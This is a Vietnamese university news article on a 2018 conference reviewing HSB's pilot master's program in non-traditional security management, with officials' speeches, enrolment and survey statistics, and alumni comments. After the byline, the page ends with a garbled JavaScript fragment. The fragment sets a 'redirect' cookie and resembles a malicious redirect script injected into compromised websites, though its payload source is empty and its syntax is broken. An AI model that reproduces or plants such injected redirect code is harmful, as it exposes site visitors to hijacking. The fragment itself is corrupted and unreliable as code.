Trung tướng GS.TS. Nguyễn Xuân Yêm, nguyên Giám đốc Học viện CSND nhiệt liệt chúc mừng thành tích tiên phong đào tạo bậc sau đại học một lĩnh vực mới

ở Việt Nam là Quản trị ANPTT của HSB. 

Ngày 25/10/2018, Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN đã tổ chức thành công Hội nghị Tổng kết Chương trình đào tạo thí điểm Thạc sĩ Quản trị An ninh phi truyền thống (Master in Management of Non-traditional Security, MNS) sau 5 năm triển khai đào tạo tại đơn vị.

Hội nghị vinh dự đón Thượng tướng, TS. Nguyễn Văn Hưởng – Nguyên Thứ trưởng Bộ Công an, Đồng tác giả Chương trình đào tạo Thạc sĩ Quản trị An ninh phi truyền thống; Thượng tướng, Viện sĩ Nguyễn Huy Hiệu – Nguyên Thứ trưởng Bộ Quốc phòng; GS.TS Mai Trọng Nhuận – Nguyên Giám đốc ĐHQGHN; GS.TS. Vũ Minh Giang – Nguyên Phó Giám đốc ĐHQGHN; Trung tướng GS.TS. Nguyễn Xuân Yêm, nguyên Giám đốc Học viện Cảnh sát Nhân dân; NGND, Trung tướng GS.TS. Nguyễn Văn Ngọc, nguyên Giám đốc Học viện An ninh Nhân dân; Thiếu tướng, PGS.TS Nguyễn Ngọc Thế – Viện Chiến lược và Kế hoạch, Bộ Công An; PGS.TS Nguyễn Hoàng Hải – Phó Giám đốc ĐHQGHN; GS.TSKH. Nguyễn Đình Đức – Trưởng ban Đào tạo, ĐHQGHN và các GS, TS, chuyên gia tham gia giảng dạy và hướng dẫn học viên MN.

Hội nghị còn có sự tham dự của các học viên, cựu học viên và các nhà tuyển dụng đang sử dụng người lao động đã tham gia học tập chương trình Thạc sĩ QTANPTT.

Phát biểu khai mạc Hội nghị, PGS.TS. Hoàng Đình Phi cho biết: “Chương trình Đào tạo Thạc sĩ Quản trị An ninh phi truyền thống (MNS) được thai nghén từ 20 năm trước từ ý tưởng của nhóm các nhà khoa học, đứng đầu là Thượng tướng, TS. Nguyễn Văn Hưởng; GS.TS Mai Trọng Nhuận – Nguyên Giám đốc ĐHQGHN; GS.TS. Vũ Minh Giang – Nguyên Phó Giám đốc ĐHQGHN. Bước đầu xây dựng chương trình gặp nhiều khó khăn do tại Việt Nam và trên thế giới chưa có cơ sở lý luận về lĩnh vực ANPTT. Với tâm huyết và sự quyết tâm, nhóm nghiên cứu đã tìm tòi, sáng tạo, gấp rút chạy đua với thời gian để mở chương trình đào tạo mới, liên ngành ở bậc thạc sĩ về ANPTT.

Thành công của chương trình MNS đã vượt ra ngoài khuôn khổ của một chương trình đào tạo, trở thành một hệ thống lý luận cho một ngành khoa học mới, đang được nhiều chuyên gia, nhà khoa học trong nước và quốc tế quan tâm”.

 HSB Hoi-nghi-MNS 2

PGS.TS Hoàng Đình Phi nhớ lại những ngày đầu khó khăn khi xây dựng hệ thống lý luận của chương trình Thạc sĩ Quản trị ANPTT

Đồng hành cùng Khoa Quản trị và Kinh doanh trong những ngày đầu xây dựng chương trình MNS, Thượng tướng, TS. Nguyễn Văn Hưởng xúc động cho biết: “Từ những năm 2003, khi còn làm lãnh đạo Bộ Công an, tôi đã nêu lên vấn đề về ANPTT, vấn đề này cũng được đề cập đến trong một số môn học tại hệ thống các trường đào tạo của quân đội. Tuy nhiên, phải đến khi Khoa Quản trị và Kinh doanh – ĐHQGHN mở thành một chương trình đào tạo mới ở bậc Sau đại học, tập hợp được đội ngũ chuyên gia liên ngành hàng đầu, cơ sở vật chất để đào tạo thì ANPTT mới thực sự trở thành một ngành khoa học với hệ thống lý luận hoàn chỉnh. Đây là sự cố gắng, nỗ lực rất lớn của đội ngũ lãnh đạo, giảng viên của HSB, đóng góp sâu sắc cho nhu cầu mới về đảm bảo an ninh quốc gia.

Tôi tin rằng mô hình đào tạo rất thiết thực, sáng tạo này sẽ tiếp tục được mở rộng và phát triển, nhất là trong thời đại công nghiệp 4.0 hiện nay.”

ZZAC9731

Theo báo cáo tổng kết chương trình đào tạo thí điểm Quản trị ANPTT, đến năm 2013, trên Thế giới, ở Đông Nam Á nói chung và Việt Nam nói riêng, chưa có trường đại học nào có mã ngành đào tạo về Quản trị ANPTT. Việc hình thành hệ thống lý luận mới và mở chương trình Thạc sĩ Quản trị ANPTT tại Khoa Quản trị và Kinh doanh – ĐHQGHN là bước đi tiên phong, sáng tạo.

Sau 5 năm triển khai (2013 – 2018), Khoa QT&KD đã không ngừng phát triển đội ngũ giảng viên, hoàn thiện nội dung và chuẩn hóa quy trình đào tạo theo đúng giá trị cốt lõi của đơn vị: Sáng tạo – Tiên phong – chất lượng. Hiện HSB đã tuyển sinh và đào tạo 173 học viên, trong đó có 42 học viên tốt nghiệp. Khoa đã tập hợp đội ngũ giảng viên có trình độ và chuyên môn cao và nhận được sự ủng hộ của nhiều các nhà khoa học, chuyên gia đầu ngành về quản trị an ninh, về quản lý kinh tế – xã hội tham gia giảng dạy. Đội ngũ giảng viên cơ hữu của Khoa là những chuyên gia hàng đầu trong một số lĩnh vực an ninh, là các nhà khoa học liên ngành tham gia trực tiếp vào quá trình quản trị, nghiên cứu, đào tạo đã có thương hiệu cá nhân và khả năng thu hút người học: Thiếu tướng, TS. Nguyễn Văn Hưởng – Nguyên Thứ trưởng Bộ Công An; Thượng tướng, PGS.TS. Bùi Văn Nam – Thứ trưởng Bộ Công an; Thượng tướng, Viện sỹ.TS Nguyễn Huy Hiệu – Nguyên Thứ trưởng Bộ Quốc phòng; TS. Lê Đình Tiến, Thứ trưởng Bộ KH-CN; PGS.TS. Trần Ngọc Ca – Nguyên Vụ trưởng, Bộ Khoa học và Công nghệ Quốc gia;…cùng nhiều giảng viên, chuyên gia quốc tế từ các trường đối tác.

 HSB Hoi-nghi-MNS 12

Hội nghị Tổng kết CTĐT Thí điểm có sự tham dự của nhiều nhà khoa học, chuyên gia hàng đầu của Việt Nam về lĩnh vực ANPTT

Phương pháp giảng dạy “Lấy người học làm trung tâm, lấy chất lượng giảng dạy làm mục tiêu chính” luôn được chương trình và các giảng viên chú trọng. Để phát huy sức mạnh của lớp học trong từng học phần, trước khi lên lớp ngoài việc giảng viên cung cấp trước danh mục các tài liệu tham khảo cũng như đề cương bài giảng để học viên chủ động, giảng viên cũng tìm hiểu về ngành nghề, mối quan tâm của phần đông người học, nắm bắt được lợi thế về kinh nghiệm công tác lâu lăm của người học, để người học có điều kiện thảo luận, chia sẻ các kiến thức kinh nghiệm của bản thân. Qua đó, tăng thêm tính liên ngành, sự hiểu biết thực tế cho người học.

Một trong những phương pháp đặc biệt mà các giảng viên sử dụng trong chương trình đào tạo MNS là cung cấp công cụ lý thuyết hay khung lý thuyết cơ bản của theo các môn học gắn với khái niệm và phương trình cơ bản của quản trị an ninh phi truyền thống (3S-3C) của tác giả Nguyễn Văn Hưởng và Hoàng Đình Phi. Đối với những học phần trong lĩnh vực kinh tế, quản trị hay đặc thù là quản trị liên ngành, việc hệ thống hóa kiến thức theo công cụ quản trị hay phương trình quản trị an ninh phi truyền thống là một sáng tạo mới, tiên phong trong lĩnh vực đào tạo này. Học viên nắm được nội dung học phần qua phương trình, cách phân tích và áp dụng hiệu quả vào thực tiễn thông qua phương pháp nêu tình huống quản trị hay vấn đề cần nghiên cứu mà giảng viên hướng dẫn. Bên cạnh đưa ra các phương trình chi tiết theo các học phần, các mô hình quản trị cũng được giảng viên giới thiệu trong bài giảng. Nội dung học phần được cụ thể hóa, ngắn gọn và xúc tích hơn, giúp học viên có thêm công cụ để hiểu nội dung bài giảng một cách khoa học. Đây chính là mục tiêu giảng dạy mà Giám đốc chương trình MNS đưa ra đối với chương trình nói chung và mỗi học phần nói riêng: Dễ học – Dễ hiểu – Dễ nhớ – Dễ vận dụng.

Cùng với việc giảng dạy chuyên môn, các giảng viên của chương trình cũng tổ chức các chuyến thực địa để học viên có thể thực hành nội dung học phần. Học viên được đi tham quan nghiên cứu tại các doanh nghiệp, thảo luận và trao đổi với lãnh đạo doanh nghiệp từ đó nâng cao được kiến thức và kinh nghiệm của bản thân.

Các học viên tốt nghiệp chương trình Thạc sĩ Quản trị ANPTT đều đang giữ các vị trí cao trong cả khu vực công và tư. Khảo sát học viên cho thấy 90,7% đánh giá cao về mức độ đáp ứng nhu cầu năng lực và trình độ nhận thức về quản trị ANPTT của chương trình. 93% vận dụng tốt các kiến thức đã học vào công việc thực tiễn. Các đơn vị sử dụng thấy rằng 87% học viên có kết quả công việc tốt hơn sau khi tham gia chương trình đào tạo.

Đánh giá cao những thành tựu đạt được trong 5 năm qua của HSB khi triển khai chương trình đào tạo MNS, GS.TS. Vũ Minh Giang – Nguyên Phó Giám đốc ĐHQGHN cho biết: “Khoa Quản trị và Kinh doanh đang đứng ở giai đoạn khó khăn khi ngành Quản trị kinh doanh đã bão hòa ở Việt Nam. Vì vậy chương trình Thạc sĩ Quản trị ANPTT đã đáp ứng nhu cầu phát triển mới, là mốc son trong lịch sử phát triển của HSB. Sự thành công của chương trình đã đi đúng chủ trương của ĐHQGHN là phát triển cả khoa học chuyên ngành và liên ngành. Học viên khi đến với Chương trình như nắng hạn gặp mưa rào, vì đây là chương trình học có tính thực tiễn cao và thiết thực trong thời đại mới 4.0 nhưng còn đang thiếu ở Việt Nam và trên thế giới. Bởi vậy họ đã mang hết tâm huyết, sự say mê khi tham gia học tập tại HSB.”

 HSB tong ket CTTS an ninh phi truyen thong

GS.TS. Vũ Minh Giang khẳng định sự thành công của chương trình đã đi đúng chủ trương phát triển cả khoa học chuyên ngành và liên ngành của ĐHQGHN.

Trong bài phát biểu tại Hội nghị, Trung tướng GS.TS. Nguyễn Xuân Yêm, nguyên Giám đốc Học viện Cảnh sát Nhân dân đã nhiệt liệt chúc mừng thành tích tiên phong đào tạo bậc sau đại học một lĩnh vực mới ở Việt Nam là Quản trị ANPTT của HSB. Trung tướng Yêm cho biết: “ANPTT là một vấn đề mới trên thế giới, khu vực và ở nước ta. Đảng, Chính phủ đã có nhiều chủ trương, biện pháp quyết liệt đối phó, giải quyết các vấn đề ANPTT đã và đang xảy ra trong thời kỳ mới. Đối với lực lượng CAND nói chung và học viện CSND nói riêng đã có nhiều biện pháp nâng cao tư duy mới về An ninh quốc gia, mở mã ngành đào tạo Thạc sĩ về ANPTT. Tuy nhiên các hoạt động trên được thực hiện chủ yếu theo chức năng của CAND. Nhân Hội nghị hôm nay, kính đề nghị Ban Giám đốc ĐHQGHN, Khoa Quản trị và Kinh doanh tiếp tục triển khai và nhân rộng mô hình đào tạo Thạc sĩ Quản trị ANPTT.”

 HSB Hoi-nghi-MNS 4

Trung tướng GS.TS. Nguyễn Xuân Yêm chúc mừng thành tích tiên phong trong đào tạo Thạc sĩ QTANPTT của khoa Quản trị và Kinh doanh.

Anh Trần Quang Đẩu – Phó Chánh văn phòng Tổng Cục Biển và Hải đảo Việt Nam, Bộ Tài nguyên và môi trường,học viên lớp MNS 03 chia sẻ: “Sau khi tốt nghiệp chương trình Thạc sĩ Quản trị ANPTT về công tác tại cơ quan Tổng cục Biển và Hải đảo Việt Nam, tôi đã vận dụng rất nhiều nội dung, kiến thức đã nghiên cứu học tập trong chương trình đào tạo vào công việc quản lý cũng như nghiên cứu của cơ quan. Đặc biệt là nội dung về công tác quản trị an ninh thông tin, Chiến lược và kế hoạch là những nội dung được triển khai nghiên cứu và ứng dụng không chỉ ở hệ thống Radar biển của Tổng cục đang quản lý mà còn được nghiên cứu ứng dụng ở cả các chuyên ngành khác như: Quản lý tổng hợp, nghiên cứu thăm dò, nghiên cứu khảo sát tài nguyên môi trường biển trên tàu nghiên cứu biển cũng như ở các đài trạm.”

HSB Hoi-nghi-MNS 21

PGS.TS Nguyễn Hoàng Hải – Phó Giám đốc ĐHQGHN khẳng định, trong thành tựu mới của ĐHQGHN nói chung có đóng góp lớn của Khoa Quản trị và Kinh doanh, trong đó có chương trình đào tạo Thạc sĩ Quản trị ANPTT, đặc biệt trong bối cảnh HSB tự chủ về tài chính. Với những thành công đã đạt được, chương trình Thạc sĩ Quản trị ANPTT xứng đáng được chính thức hóa thành mã ngành đào tạo quốc gia.

HSB Hoi-nghi-MNS 22

Dưới đây là một số hình ảnh về Hội nghị Tổng kết CTĐT Thí điểm Thạc sĩ Quản trị An ninh phi truyền thống tại khoa Quản trị và Kinh doanh (HSB):

 HSB Hoi-nghi-MNS 1

HSB Hoi-nghi-MNS 3

HSB Hoi-nghi-MNS 5

HSB Hoi-nghi-MNS 6

HSB Hoi-nghi-MNS 8

HSB Hoi-nghi-MNS 7

HSB Hoi-nghi-MNS 10

HSB Hoi-nghi-MNS 18

HSB Hoi-nghi-MNS 20

 Thùy Dung

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}